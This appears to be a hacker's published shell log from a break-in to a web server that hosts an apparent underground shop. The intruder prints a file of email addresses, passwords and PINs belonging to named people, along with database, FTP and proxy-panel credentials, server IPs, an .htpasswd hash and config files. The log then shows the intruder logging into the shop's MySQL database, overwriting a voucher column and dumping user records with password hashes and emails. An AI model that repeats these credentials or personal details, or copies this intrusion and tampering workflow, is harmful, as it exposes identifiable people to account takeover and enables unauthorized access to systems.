-rw-r--r-- 1 mmgen www 24560317 Jan 26 2011 St0reinfo - Shopdesign2.psd
-rw-r--r-- 1 mmgen www 1124 Jan 26 2011 TeamViewer 6.lnk
-rw-r--r-- 1 mmgen www 917 Jan 26 2011 WebMoney Keeper Classic 3.9.3.1.lnk
-rw-r--r-- 1 mmgen www 40467 Jan 26 2011 Werbung.png
-rw-r--r-- 1 mmgen www 3821 Jan 26 2011 btn2.png
-rw-r--r-- 1 mmgen www 68286 Jan 26 2011 btn2.psd
-rw-r--r-- 1 mmgen www 748437 Jan 26 2011 exported data.txt
-rw-r--r-- 1 mmgen www 1179 Jan 26 2011 head.gif
-rw-r--r-- 1 mmgen www 1789314 Jan 26 2011 head.psd
-rw-r--r-- 1 mmgen www 2084608 Jan 26 2011 hinten.png
-rw-r--r-- 1 mmgen www 791 Jan 26 2011 new 2.txt
-rw-r--r-- 1 mmgen www 1133 Jan 26 2011 new 5.txt
-rw-r--r-- 1 mmgen www 528 Jan 26 2011 new 9.txt
-rw-r--r-- 1 mmgen www 3318 Jan 26 2011 passwords.txt
-rw-r--r-- 1 mmgen www 145044 Jan 26 2011 pp.rar
-rw-r--r-- 1 mmgen www 31694808 Jan 26 2011 setup.exe
-rw-r--r-- 1 mmgen www 353781 Jan 26 2011 store.rar
-rw-r--r-- 1 mmgen www 74196 Jan 26 2011 title.gif
-rw-r--r-- 1 mmgen www 76765 Jan 26 2011 title_unreg.gif
-rw-r--r-- 1 mmgen www 2286399 Jan 26 2011 vorne.png
-rw-r--r-- 1 mmgen www 1087 Jan 26 2011 wrub4sts.lnk
#
# cat passwords.txt
j_username=sny@vtxmail.ch
j_password=tino55
pin=tino55
j_username=office@vertec-systems.com
j_password=121066
pin=
j_username=DeineMutter@fickich.net
j_password=Diehuredie
pin=1234dudummestier
j_username=HeyduFotze@magdich.net
j_password=ArschPo
pin=verarschmichnicht
j_username=mybigmouth@web.de
j_password=andrea
pin=1950
j_username=
j_password=
pin=
j_username=Rainer.Keberle@online.de
j_password=finepix4700
pin=
j_username=1746378
j_password=
pin=q206mitte
j_username=1746378
j_password=
pin=q206mitte
j_username=2187452
j_password=
pin=q206mitte
j_username=rababa@whitehouse.gov
j_password=dollar
pin=4711
j_username=170734837
j_password=express12
pin=
j_username=office@otto-stoeckl.com
j_password=
pin=
j_username=170734837
j_password=express
pin=12
j_username=nicole.dargel@gmx.de
j_password=Diving66
pin=
j_username=claudia.schultz@shell.com
j_password=chris1
pin=4449
j_username=claudia.schultz@shell.com
j_password=chris1
pin=4449
j_username=claudia.schultz@shell.com
j_password=chris1
pin=
j_username=734093
j_password=19birgit
pin=7578
j_username=734093
j_password=19nadine
pin=7578
j_username=734093
j_password=birgit
pin=7578
j_username=sabina.mastrogiovanni@gmx.de
j_password=2dU8yU9qY4aC
pin=5942
j_username=sabina.mastrogiovanni@gmx.de
j_password=2dU8yU9qY4aC
pin=5942
j_username=Heldmann_C@web.de
j_password=
pin=6237
j_username=Heldmann_C@web.de
j_password=
pin=6237
j_username=benjamin.egermann@gmail.com
j_password=pcarmy
pin=6039
j_username=sabina.mastrogiovanni@gmx.de
j_password=2dU8yU9qY4aC
pin=5942
j_username=
j_password=
pin=
j_username=danisahne8283@aol.com
j_password=
pin=masenfan
j_username=danisahne8282@aol.com
j_password=masenfan
pin=5556
j_username=danisahne8283@aol.com
j_password=
pin=
j_username=danisahne8283@aol.com
j_password=masenfan
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=
j_password=
pin=
j_username=hannesvw@gmail.com
j_password=
pin=9016
j_username=Thomas.Wunder@hv-s.de
j_password=Mannheim
pin=
j_username=mail@obu-hamburg.de
j_password=obu2009
pin=
j_username=mail@obu-hamburg.de
j_password=2493
pin=
j_username=mail@obu-hamburg.de
j_password=OBU2009
pin=
j_username=31971258
j_password=
pin=2493
j_username=mario.hoefler@web.de
j_password=nutpen10
pin=
j_username=E.Giegler@web.de
j_password=Eschen
pin=5115
j_username=E.Giegler@web.de
j_password=Eschen
pin=5115
j_username=mail@obu-hamburg.de
j_password=obu2009
pin=2394
# cat Data.txt
MySQL
https://91.213.8.13/myadmin/
$host = localhost
$user = Palshop
$pass = u5AunWox
$data = morgen_Palshop
FTP:
91.213.8.26
morgen
2Rysb2Kv
5socks
http://admin.5socks.net/
Morgen
Kzmv7QkvIf
0458-8466-1325-4447 UVszBT <<<< 50?#
# cd ..
# cd ..
# cd st0re.morgen.w2c.ru
# ls -la
total 16
drwxrwx--- 4 mmgen www 512 Dec 2 2010 .
drwxr-x--- 7 mmgen www 512 Jun 11 13:18 ..
drwxr-xr-x 5 mmgen www 512 Dec 2 2010 admin
drwxr-xr-x 8 mmgen www 512 Dec 3 2010 content
# cd admin
# ls -la
total 56
drwxr-xr-x 5 mmgen www 512 Dec 2 2010 .
drwxrwx--- 4 mmgen www 512 Dec 2 2010 ..
-rw-r--r-- 1 mmgen www 8621 Dec 2 2010 DE.lng
-rw-r--r-- 1 mmgen www 1546 Dec 2 2010 admin.php
-rw-r--r-- 1 mmgen www 708 Dec 3 2010 config.php
drwxr-xr-x 3 mmgen www 512 Dec 2 2010 designe
-rw-r--r-- 1 mmgen www 1008 Dec 2 2010 functions.php
drwxr-xr-x 4 mmgen www 512 Dec 2 2010 img
-rw-r--r-- 1 mmgen www 876 Dec 3 2010 index.php
drwxr-xr-x 2 mmgen www 512 Dec 2 2010 pages
# cat config.php
<?php
/***************
/ PalShop /
/ By Paloxus /
/ v 1.5 /
***************/
session_start();
error_reporting(0);
$host = 'localhost'; //mysql host
$user = 'mmgen_shop'; //db user
$pass = '1y2x3c4v'; //db pass
$data = 'mmgen_shop'; //db name
$connect = mysql_connect($host, $user, $pass);
mysql_select_db($data, $connect);
$ajax = '0'; //use ajax [ 0 = no, 1 = yes ]
$guthaben = '€'; // [ $, ? = £, ? = ¥, ? = € ]
$designe = 'design'; // blue oder dark
$session_prefix = '1y2x3c4v'; // DRINGEND ?NDERN! Beispielsweise in eine Buchstaben-Zahlen Kombination
$language = 'DE'; //Sprache des CMS
//Produkt Bilder:
$prod_img = 1; // Produktbilder verwenden 1 = Ja, 2 = Nein
?>
# cd /home/mmgen/st0re.cc
# ls -la
total 1522696
drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .
drwxr-x--- 7 mmgen www 512 Jun 11 13:18 ..
-rw-r--r-- 1 mmgen www 16950051 Sep 13 01:08 1.mp3
-rw-r--r-- 1 mmgen www 941752 Sep 30 16:19 2.rar
-rw-r--r-- 1 mmgen www 144694 Jan 30 2011 3.jpeg
-rw-r--r-- 1 mmgen www 760708777 Sep 13 00:58 4.rar
-rw-r--r-- 1 mmgen www 30654 Feb 22 2011 Banner.jpg
-rw-r--r-- 1 mmgen www 40505 Feb 7 2011 Banner4.jpg
-rw-r--r-- 1 mmgen www 13347 Feb 3 2011 Jelly.jpg
-rw-r--r-- 1 mmgen www 53943 Feb 3 2011 Kamagra.png
drwxr-xr-x 3 mmgen www 512 Feb 21 2011 Neu
drwxr-xr-x 3 mmgen www 512 Jun 2 18:52 Ref
-rw-r--r-- 1 mmgen www 8967 Jul 17 16:04 Ukash.php
-rw-r--r-- 1 mmgen www 4756 Jan 27 2011 account.php
-rw-r--r-- 1 mmgen www 1532 Jan 27 2011 account_do.php
-rw-r--r-- 1 mmgen www 978 Jan 27 2011 add_basket.php
drwxr-xr-x 7 mmgen www 512 Mar 10 2011 admin
-rw-r--r-- 1 mmgen www 164100 Apr 10 16:10 banner.gif
-rw-r--r-- 1 mmgen www 2398 Jan 28 2011 basket.php
-rw-r--r-- 1 mmgen www 11921 Jul 21 23:44 cashin.php
-rw-r--r-- 1 mmgen www 2278 Apr 9 18:00 category.php
-rw-r--r-- 1 mmgen www 5223 Mar 10 2011 cc_modul.php
-rw-r--r-- 1 mmgen www 2265 Feb 8 2011 checkout.php
-rw-r--r-- 1 mmgen www 1471 Jan 27 2011 error.php
-rw-r--r-- 1 mmgen www 1007 Jan 27 2011 faq.php
-rw-r--r-- 1 mmgen www 1406 Apr 18 12:49 favicon.ico
-rw-r--r-- 1 mmgen www 17594 Jan 27 2011 head.png
drwxr-xr-x 2 mmgen www 512 Aug 21 22:23 ico
-rw-r--r-- 1 mmgen www 7623 Jun 2 19:58 index.php
drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 libs
-rw-r--r-- 1 mmgen www 886 Jan 27 2011 login.php
-rw-r--r-- 1 mmgen www 1177 Jan 27 2011 login_do.php
-rw-r--r-- 1 mmgen www 164 Jan 27 2011 logout.php
-rw-r--r-- 1 mmgen www 1879 Jan 27 2011 product.php
-rw-r--r-- 1 mmgen www 1319 Jan 27 2011 register.php
-rw-r--r-- 1 mmgen www 1827 Jan 27 2011 register_do.php
drwxr-xr-x 3 mmgen www 512 May 17 03:21 style
-rw-r--r-- 1 mmgen www 8011 Apr 13 21:31 support.php
-rw-r--r-- 1 mmgen www 2417 Apr 13 21:31 support_do.php
# cd admin
# ls -la
total 268
drwxr-xr-x 7 mmgen www 512 Mar 10 2011 .
drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 ..
-rw-r--r-- 1 mmgen www 106 May 17 13:31 .htaccess
-rw-r--r-- 1 mmgen www 40 Jun 2 18:50 .htpasswd
-rw-r--r-- 1 mmgen www 8372 Feb 8 2011 category.php
drwxr-xr-x 2 mmgen www 512 Feb 8 2011 css
-rw-r--r-- 1 mmgen www 4599 Jan 27 2011 faq.php
drwxr-xr-x 6 mmgen www 512 Feb 8 2011 images
-rw-r--r-- 1 mmgen www 14618 Mar 10 2011 index.php
-rw-r--r-- 1 mmgen www 8549 Feb 13 2011 items.php
drwxr-xr-x 7 mmgen www 512 Feb 8 2011 js
drwxr-xr-x 3 mmgen www 512 Jan 27 2011 libs
-rw-r--r-- 1 mmgen www 7359 Mar 10 2011 modul.php
-rw-r--r-- 1 mmgen www 9007 Feb 8 2011 news.php
-rw-r--r-- 1 mmgen www 1256 Jan 27 2011 option.php
-rw-r--r-- 1 mmgen www 11703 Feb 8 2011 product.php
drwxr-xr-x 3 mmgen www 512 Jan 27 2011 style
-rw-r--r-- 1 mmgen www 18 Jan 29 2011 test.php
-rw-r--r-- 1 mmgen www 10040 Apr 9 19:18 tickets.php
-rw-r--r-- 1 mmgen www 12164 Feb 8 2011 user.php
-rw-r--r-- 1 mmgen www 17532 Feb 8 2011 voucher.php
# cat .htaccess
AuthType Basic
AuthName "FUCK YOU"
AuthUserFile /home/mmgen/st0re.cc/admin/.htpasswd
Require valid-user
# cat .htpasswd
Admin:$1$5KnX9ENu$aKqzHTLd5HpMqKqgnglUx/
# cd ..
# cd libs
# ls -la
total 56
drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 .
drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 ..
-rw-r--r-- 1 mmgen www 2757 Jan 27 2011 class_bbcode.php
-rw-r--r-- 1 mmgen www 1561 Jan 28 2011 class_user.php
-rw-r--r-- 1 mmgen www 227 Jun 2 18:20 mysql_config.php
-rw-r--r-- 1 mmgen www 1312 Apr 11 00:18 psc_cashin.class.php
-rw-r--r-- 1 mmgen www 4383 Jul 19 21:35 ukash_cashin.class.php
-rw-r--r-- 1 mmgen www 7679 Apr 8 17:21 xxx_psc_cashin.class.php
# cat mysql_config.php
<?php
#####################
# LudenCMS v1 #
# mysql_config.php #
#####################
$mysql_host = "localhost";
$mysql_username = "mmgen_shop";
$mysql_password = "og.39//(kl";
$mysql_database = "mmgen_shop";
?>
So let's check out their SHOP DB
# mysql -u mmgen_shop -D mmgen_shop -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 89332
Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mmgen_shop |
| test |
+--------------------+
3 rows in set (0.00 sec)
mysql> SHOW TABLES;
+----------------------+
| Tables_in_mmgen_shop |
+----------------------+
| shop_basket |
| shop_ccmodul |
| shop_coupon |
| shop_faq |
| shop_items |
| shop_navigation |
| shop_news |
| shop_options |
| shop_orders |
| shop_products |
| shop_tickets |
| shop_user |
| shop_voucher |
+----------------------+
13 rows in set (0.00 sec)
mysql> # LOLOLO let's rm password info
mysql> UPDATE shop_voucher SET infos = "";
Query OK, 11 rows affected (0.00 sec)
Rows matched: 11 Changed: 11 Warnings: 0
mysql> SELECT * FROM shop_voucher;
+-------+--------+------+---------------------+-------+-------+------------+
| payid | userid | type | code | infos | value | date |
+-------+--------+------+---------------------+-------+-------+------------+
| 1872 | 10522 | 1 | 0905-1066-3280-8205 | | 10 | 2011-09-30 |
| 1873 | 10522 | 1 | 0747-8763-8777-7583 | | 10 | 2011-09-30 |
| 1874 | 10482 | 1 | 0170-8844-2643-6121 | | 10 | 2011-09-30 |
| 1875 | 10161 | 1 | 0662-3887-5897-6736 | | 21 | 2011-09-30 |
| 1877 | 8885 | 1 | 0795-2181-5472-4078 | | 10 | 2011-09-30 |
| 1878 | 10575 | 1 | 0508-5218-3536-7066 | | 10 | 2011-09-30 |
| 1869 | 10568 | 1 | 0725-8889-7048-6149 | | 10 | 2011-09-30 |
| 1870 | 10300 | 1 | 0677-5871-1938-8696 | | 10 | 2011-09-30 |
| 1871 | 10557 | 1 | 0570-2670-2925-4453 | | 100 | 2011-09-30 |
| 1402 | 5356 | 0 | | | 0 | 2011-07-21 |
| 1403 | 9652 | 0 | | | 0 | 2011-07-21 |
+-------+--------+------+---------------------+-------+-------+------------+
11 rows in set (0.00 sec)
mysql> # Now how about we check who actually buys shit
mysql> SELECT * FROM shop_user WHERE credits > 5;
+--------+---------------+----------------------------------+--------------+---------+--------+---+
| userid | username | password | icq | credits | status | x |
+--------+---------------+----------------------------------+--------------+---------+--------+---+
| 6 | J0hn.X3r | dbd570d9cfb7ee0473a7890e641a1f45 | 898437 | 20 | 0 | 0 |
| 189 | Arma | 93f5d2a618cde4160d3eb8f748221f91 | arma@hush.ai | 10 | 0 | 0 |
| 208 | iron.t | 9b630edecc947a5f9e5d4ca59462663f | iron.t@hotbo | 15 | 0 | 0 |
| 514 | ngized | 3dcbb61d6599e4cbe89510c28f324f66 | camora18@web | 10 | 0 | 0 |
| 571 | basha | 1618a9fe1c58f2bedd2fdccefaa6da21 | basha444@web | 9 | 0 | 0 |
| 625 | stefgexp | 55132608a2fb68816bcd3d1caeafc933 | c.k.007@web. | 40 | 0 | 0 |
| 794 | Tanoths | b5042eac66b4bdb8c6e42560f964ed3c | max@lilium-n | 23 | 0 | 0 |
| 804 | TB4ever | 4be5ce67d73fb9b6dda4d91d45387d16 | jjstyler@liv | 7 | 0 | 0 |
| 945 | Sven | 3dd19f98fd4adb12e6cee669341381aa | vb-sveiven@w | 10 | 0 | 0 |
| 973 | binglly | 1a7384005bd77b151e11d58ac79da095 | binglly@web. | 10 | 0 | 0 |
| 1120 | etrax | 4f0cb9262f0a0fdab6c9db4c122024c2 | etrax@secure | 10 | 0 | 0 |
| 1174 | JUMPhil | 40d914022aca12c372304e1cf2e89b88 | 836499 | 9 | 0 | 0 |
| 1195 | m0rpheus | 06aa90cb7e31b1de837cdfd4b837163c | m0rpheusz@o2 | 10 | 0 | 0 |
| 1207 | HansMeier | 44354626326b1cd44cce845e8393ac0d | hansmeierfor | 6 | 0 | 0 |
| 1353 | dr.mouse | b5ba41ed05b0b197546e2a4283af77ae | gucci23@hush | 7 | 0 | 0 |
| 1691 | play | 0c2192030b08d26b06b073eef083548a | b4252353@ugg | 17 | 0 | 0 |
| 1771 | fros | e0e93346794bf614a1f02254d9d8b21e | ritho.ritho@ | 10 | 0 | 0 |
| 1810 | melvyn10 | 41df744f22aa3d7f81983a77e2899829 | melvyn10@081 | 15 | 0 | 0 |
| 1941 | phyntox | 33d42d1eb34ec443704571b0ce34193e | phyntox@goog | 10 | 0 | 0 |
| 1967 | fatal | 592b36d730c592cce0eebe1731d143ec | fatal3x@live | 7 | 0 | 0 |
| 2010 | Dodo | d6d963cedb8dbc1ee57f271e942fbadd | bennibluemch | 7 | 0 | 0 |
| 2301 | Blizzardo | 15b29ffdce66e10527a65bc6d71ad94d | blizzardfert | 10 | 0 | 0 |
| 2415 | ecstasy | 887e1733037e9af10502b8bf923ad202 | Riehm93@onli | 6 | 0 | 0 |
| 2478 | basics | cf7303a964a1682deeb3db90fbe3aeab | admin@mail-s | 6 | 0 | 0 |
| 2630 | Stehlampe | db1527f7ecd3dd38f5de94e38cae2c53 | waswillstdud | 20 | 0 | 0 |
| 2641 | mettwurst | 245a93ee61572bdda20c145374192603 | mettwurst@sa | 8 | 0 | 0 |
| 2677 | Syntax | 068d03ef735f14d75cd78d0ad5e427a3 | psych0tik@li | 13 | 0 | |
| 2696 | seife123 | a2327b1893edf0719cc1f29b8d807957 | azzzze@yahoo | 10 | 0 | 0 |
| 2703 | fam0us | 8f036369a5cd26454949e594fb9e0a2d | ifam0us@hotm | 20 | 0 | 0 |
| 2731 | Borni81 | 8d8e4a0f1607ecb8790bce4d03331749 | bornito@live | 6 | 0 | 0 |
| 2763 | termi | 573bd983f1a92bb6cf8b535919e3a728 | Hans.olaf1@w | 6 | 0 | 0 |
| 2827 | O.M.A. | 6b8d556a2c4e1a17c57c4019d58377f7 | Mueller_Simo | 7 | 0 | 0 |
| 2861 | Epicfisch | 5785adb4d56e4dd0e2732c26ccc3a0ca | admin@stream | 10 | 0 | 0 |
| 2960 | daunilein | 0e1ffc254643ad1b3a006a347146282f | downi@downi. | 6 | 0 | 0 |
| 3101 | Pr3dator | 65a5a3d88782ceb6af221234670ec8fb | christian.ri | 13 | 0 | 0 |
| 3135 | hassan3 | 8ce4ffbdd4b371c255be75734f26cd72 | guzter@ahoo. | 10 | 0 | 0 |
| 3208 | maddox | 4a3ef4824d67af46ea57a39b72dea7df | a3351613@owl | 8 | 0 | 0 |
| 3256 | k00ky | 649f7f3295eb1163604ce906b6a6c498 | k00ky@hotmai | 9 | 0 | 0 |
| 3266 | 1337man | f29f5f0849fec2e6bc1c10de788410fa | roflfastlola | 11 | 0 | 0 |
| 3321 | djinns | c316236440037c0a621d592222708b72 | djinnsrs@goo | 8 | 0 | 0 |
| 3433 | fluxay | 64d1f88b9b276aece4b0edcc25b7a434 | dir@mailinat | 70 | 0 | 0 |
| 3628 | BOMBER | 8e26756ab1075b72dd82965c3d67c162 | bersch5555@w | 6 | 0 | 0 |
| 3731 | testuser0 | 68b62823ed173ad3bed0ce700d556b2a | b999347@owlp | 25 | 0 | 0 |
| 3829 | Skywalker | 077efa5fc07874cb04bd359845314743 | b1459562@owl | 10 | 0 | 0 |
| 3905 | Plasmasmog | ba9912907e468a911de722cd811b99b2 | Plasmasmog@m | 10 | 0 | 0 |
| 3951 | master1234 | bffdd53cd1557a14c84b6f42f2012187 | forfreemovie | 10 | 0 | 0 |
| 4038 | !XSS | 5b84d7e9450f523d263a1e2844d333da | xss-xss@Safe | 17 | 0 | 0 |
| 4114 | sh0x | 7e573aedbe6d321228de54fcacee7ebd | leandroking@ | 6 | 0 | 0 |
| 4121 | slice | c53c7a272390264c5e6beddcc410daa5 | esel@yahoo.d | 10 | 0 | 0 |
| 4140 | Dennske | f8eb6ce796e56b0260d9e77c6e057a20 | wccrew@web.d | 10 | 0 | 0 |
| 4144 | -Bounter- | 2fec358d161f20e1d51e24641d76312f | dreamy@warez | 10 | 0 | 0 |
| 4470 | Phantonym | 95abaa72bd229ec8f058519bb4bcfe87 | Phantonym@hu | 11 | 0 | 0 |
| 4474 | CyberTT | df53ca268240ca76670c8566ee54568a | a1679852@bof | 6 | 0 | 0 |
| 4476 | Getter | 530ea1472e71035353d32d341ecf6343 | a1682682@bof | 50 | 0 | 0 |
| 4808 | ceres2 | dd4df322be3679fc422ab3d45fc97e96 | ceres@imails | 13 | 0 | 0 |
| 4846 | check | 3756dd32ed2706bb3b6fc004b0e4ef80 | senmobiles@h | 8 | 0 | 0 |
| 4890 | lgdavid | 5daec48bdfda7423e079b99c80c13ed1 | david.wang20 | 7 | 0 | 0 |
| 4919 | stronger87 | ea110dfdeb4b966c81f7d786df7b1192 | dirkbischof@ | 10 | 0 | 0 |
| 4944 | burberry | 55f9c405bd87ba23896f34011ffce8da | burberry1337 | 6 | 0 | 0 |
| 5088 | L4x1337 | 7518f76db987755dbb01c52e177ba134 | 591238155 | 8 | 0 | 0 |
| 5126 | Neon | ab64f71b84891bc31fe85512d35716a8 | neon19881@we | 10 | 0 | 0 |
| 5401 | schlecker | cf14f069b4e041d13f50361dd54b9a33 | sjsj@web.de | 8 | 0 | 0 |
| 5446 | sexy1337 | e10adc3949ba59abbe56e057f20f883e | sadsadasdmer | 9 | 0 | 0 |
| 5642 | firelabs | 076c91ca1a80a49970a3e094ef5954cf | fuckthatbitc | 10 | 0 | 0 |
| 5727 | 2t-power | 0df174153bd462f50c728006d9d1c704 | eiermann@hus | 6 | 0 | 0 |
| 6079 | pete | 620209aea87f7bae2bd2445d094ba275 | karl-otto3@w | 20 | 0 | 0 |
| 6092 | accored | bc47508edab07c1a0082c714fdc08eab | acc0r3d@yaho | 18 | 0 | 0 |
| 6167 | mercury | 98169b656c826331d6e9d5e334ca7be8 | fakemail@bla | 10 | 0 | 0 |
| 6183 | Roxas | d412a68fd7624bfe220f55f53c26f5a7 | Roxas_1991@g | 20 | 0 | 0 |
| 6187 | Redbullfly | 3a82ca9ca9bfe5db9d9eda406c13ac61 | Redbullfly@g | 8 | 0 | 0 |
| 6263 | Madd1n | e2a2a6d692a27773a9da52f7e82cfde7 | martinkieser | 6 | 0 | 0 |
| 6465 | terror | 9a1b0d5d2d14b7272183d51fe5914f25 | b1245111@lhs | 12 | 0 | 0 |
| 6549 | drupp | e19d5cd5af0378da05f63f891c7467af | drupp88@goog | 53 | 0 | 0 |
| 6590 | _wayne | dc8996397be86e49cb56fd6face00c7f | mkoch@live.d | 6 | 0 | 0 |
| 6667 | krillewurm | 06e0274429fc435c0335237c0006f13c | easy-riderz@ | 25 | 0 | 0 |
| 6689 | sundy | 263f55f9f491876ebe21af13c2ee4589 | ra.klaus.sta | 7 | 0 | 0 |
| 6772 | 1311 | 2aed094745c811516aea636e52015bc8 | 2010@9y.com | 10 | 0 | 0 |
| 6820 | drbob | edfff284ca91b5676d8caa85f0cfd1df | BlackDesire2 | 20 | 0 | 0 |
| 6885 | Lankabel | 4297f44b13955235245b2497399d7a93 | 123@123.123 | 35 | 0 | |
| 6953 | fr34c10 | 200820e3227815ed1756a6b531e7e0d2 | festner@mail | 10 | 0 | |
| 7040 | Cysis | 984c8c7b5d1d358c1470b1a2f81cdd3b | 4216SD@gmail | 40 | 0 | |
| 7042 | Fire | e94e346e5bb49449d6d607939ddbf63c | cyler@hotmai | 8 | 0 | |
| 7072 | drbob100 | 8faddb27516de448b4f7a434b5a7130a | Blackddeess@ | 20 | 0 | |
| 7105 | runner91 | 8a7d489dbea2c6d8ad710b47ea68bc05 | malli-2006@w | 7.5 | 0 | |
| 7190 | jacov | f30d05ead11bea743d583e4282e304f6 | n0b0dy.fh@we | 7 | 0 | |
| 7193 | kratos1 | 59779937922f0264885e4f871257be48 | fgikto@googl | 7 | 0 | |
| 7227 | s30s | 5103c1995af9f7fc6751de332bcfdfd3 | xc0ree@cust. | 7 | 0 | |
| 7603 | fws | 73cb82e5496bfc9e4a6bc70ea2826e56 | ao@f-ws.de | 32 | 0 | |
| 7803 | CodeRed | e89b7c5cc238c5871ceeafe46d3d3154 | CodeRed94@ho | 6 | 0 | |
| 7827 | liviu | 65399351c23e646ae6ad68c938015c14 | zut@wet.de | 6 | 0 | |
| 7887 | Anything | 9f4633f632153c74bcddcbf9c1d2fbed | 113377 | 9 | 0 | |
| 7899 | piren20 | cc03e747a6afbbcbf8be7668acfebee5 | mh.zeh@web.d | 10 | 0 | |
| 7925 | sdffsf | c02711d20a521eb8d1e5aeefb6bbecab | dfds@sd.de | 7 | 0 | |
| 8114 | sTiNN | 745c0ccdb25262e3a17afe9fd6456a5c | stinn@live.d | 6 | 0 | |
| 8122 | bigdady | 9933fb405b690fb59015b8981e09e671 | 621178350 | 10 | 0 | |
| 8249 | freestyl | 2968da776da97fdd7d4910189411804e | as7da9d@gmx. | 20 | 0 | |
| 8324 | kamel | e73e1bd2feb22b75c0ec0cacfd0b9d25 | 81023871 | 13 | 0 | |
| 8340 | iphonejumper | 5db9e40fd1ae010e435884cedbfde349 | | 7 | 0 | |
| 8408 | joe321 | f36e8a3b77970d55a984672972555c40 | | 35 | 0 | |
| 8414 | Crackfox | 10b43971a8295f3720f38fbcdd9d6ac6 | | 6 | 0 | |
| 8470 | shoxx12 | 1e45690858e3dfdeebbd67eb5db2653b | | 5.5 | 0 | |
| 8493 | alexander | dd22141acb5ea065acd5ed773729c98f | 000000 | 30 | 0 | |
| 8554 | hurens0hn | 08ba21f5a9f192e3114ce9c3d29c0f8f | 383051368 | 25 | 0 | |
| 8580 | Bester12 | 8e2a99e1e5e356f5b9b874c8d9d83c79 | 456 | 40 | 0 | |
| 8627 | Kleedyyy | 8d0c8f9d1a9539021fda006427b993b9 | | 7 | 0 | |
| 8645 | Energie | ea110dfdeb4b966c81f7d786df7b1192 | | 7 | 0 | |
| 8691 | JimPanse | f56a8901702b2c279c065f2ca15890ec | | 8 | 0 | |
| 8744 | cubee | 4a3ef4824d67af46ea57a39b72dea7df | | 7 | 0 | |
| 8762 | Dodel | 5657c76ad9a05ea0d9899f94dc4121e9 | | 8 | 0 | |
| 8826 | kuni77 | 22f3555c832cde0134c65e9cb44424ee | 615664295 | 7 | 0 | |
| 8866 | sysfuck | 95a3d9c2bce545f46bc54d8a750438b1 | | 17.5 | 0 | |
| 8879 | payment | ed8539ed5fe17d4dc3a18058831fb9bd | | 10 | 0 | |
| 8890 | PolskaDumny | c288a40b22e236022e43f96cf7bab952 | 165-034 | 8.5 | 0 | |
| 8933 | Dubstep | 3116ccacabe066ce091b171347fca80d | 427-073-373 | 25.2 | 0 | |
| 8960 | Hotter | 0981ee032a8e8af483dc24390916c737 | 282979840 | 7.5 | 0 | |
| 8969 | network44 | 44252cf93dd7a73ecc031f8363a26459 | 618445 | 10 | 0 | |
| 9010 | sey | f2f6ca16e070070fc5465ab4209586b5 | | 10 | 0 | |
| 9094 | MrPataa | 9c7b04e137048c6dc5bc2dae0f78bf68 | | 10 | 0 | |
| 9122 | Semtex99 | 9ca40c627bb00f08347cf336fb09011b | | 9 | 0 | |
| 9183 | trainee | a2147086850706ecb2b6f2919fed8e40 | 350610 | 7 | 0 | |
| 9216 | opfa | 01fc7192adba9cbba78b612ebeca6b66 | | 11 | 0 | |
| 9223 | ivory | 00b86e77b9f76fc1f466555b6af345f8 | | 10 | 0 | |
| 9253 | blur121 | 7e4ea1bf5ca4e36d14e6296e485970f2 | | 10 | 0 | |
| 9590 | kani2012 | ec11aacc5832b63f02f1269e89d3cdd7 | 858223 | 7 | 0 | |
| 9269 | drm1hy | c6cb19878e6a335d4fabb115ca8e3605 | | 24 | 0 | |
| 9273 | TrOvEjAr | 9378884c5f76bf23f5aaedd1035017ba | 234307423 | 20 | 0 | |
| 9275 | gist505 | fcdd4eae6aff919545ff68b6e3943b91 | | 8.98 | 0 | |
| 9298 | mrgreen | 824a67f29e97b8798a9df7f00189f3e1 | | 35 | 0 | |
| 9307 | GStar | 2472ee727ed8de9a818fc657a6895646 | | 10 | 0 | |
| 9310 | Domi93 | b36d331451a61eb2d76860e00c347396 | | 8 | 0 | |
| 9348 | pwned | 530ea1472e71035353d32d341ecf6343 | | 6.5 | 0 | |
| 9357 | darkt0wn | a56b6119d6c8be8e2d0d25bcfdca25c6 | | 10 | 0 | |
| 9375 | optik | d6ae345d39ca27dcc9c8e9c30a814041 | | 7 | 0 | |
| 9397 | U3 | 93327f2856df1105a1318895ac44e684 | 645458882 | 20.2 | 0 | |
| 9410 | mule22 | d27c8e6c3222ea5da09eb7f0f9d56818 | | 7 | 0 | |
| 9448 | BL4cKKS | cdbec512b7a848722346013aa3e44f8b | | 7 | 0 | |
| 9508 | PEPPEP | 6ec176f463121c7a1fc2f442ba22e937 | | 6 | 0 | |
| 9534 | Cardercc | 461ae6b500f5802d4d52b34643cdcc6e | | 11 | 0 | |
| 9599 | nolandro | 78f5cf8d0ee4f6b1e612a36954c1254d | | 50 | 0 | |
| 9600 | KoKaiiiN | dc74e595f9938b1ea1f1a078ae154949 | 363727670 | 6 | 0 | |
| 9618 | D3DMan | e78e0c9c18a6490ef56c3ffe837e0fca | | 10.5 | 0 | |
| 9621 | Abdulleben | 25d55ad283aa400af464c76d713c07ad | | 6.5 | 0 | |
| 9631 | sexonthebeach | 2dfbaaecbe98198ace8c554cc426b6d4 | | 44 | 0 | |
| 9701 | heiko4321 | 12a6265a271b7b23e943f5986d80d190 | | 7.5 | 0 | |
